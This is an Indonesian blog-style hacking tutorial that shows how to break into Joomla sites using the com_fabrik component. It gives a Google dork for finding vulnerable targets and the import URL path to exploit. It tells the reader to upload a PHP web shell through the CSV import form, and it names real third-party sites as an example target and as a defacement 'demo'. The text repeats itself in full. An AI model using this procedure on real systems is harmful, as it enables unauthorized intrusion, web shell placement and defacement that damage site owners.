Assalamualaikum .sampai sekarang masih ada saja
situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam
mencari target dan kepandaian mengolah google dork.
Oke, langsung saja.
Google Dork :
inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]
Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Sebagai contoh, saya pilih http:/svdh-grosskrotzenburg.de/index.php?option=com_fabrik
Ubah urlnya menjadi : http://www.svdh-grosskrotzenburg.de/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV
Dan shell kita akan terletak di [site]/media/[shell.php]
Terus, hajar !!!!
Demo :
http://www.salvi.it/media/DzikriID.html
Author: Dzikri Dot ID
Google Dork :
inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]
Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Sebagai contoh, saya pilih http:/svdh-grosskrotzenburg.de/index.php?option=com_fabrik
Ubah urlnya menjadi : http://www.svdh-grosskrotzenburg.de/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV
Dan shell kita akan terletak di [site]/media/[shell.php]
Terus, hajar !!!!
Demo :
http://www.salvi.it/media/DzikriID.html
Author: Dzikri Dot ID
ConversionConversion EmoticonEmoticon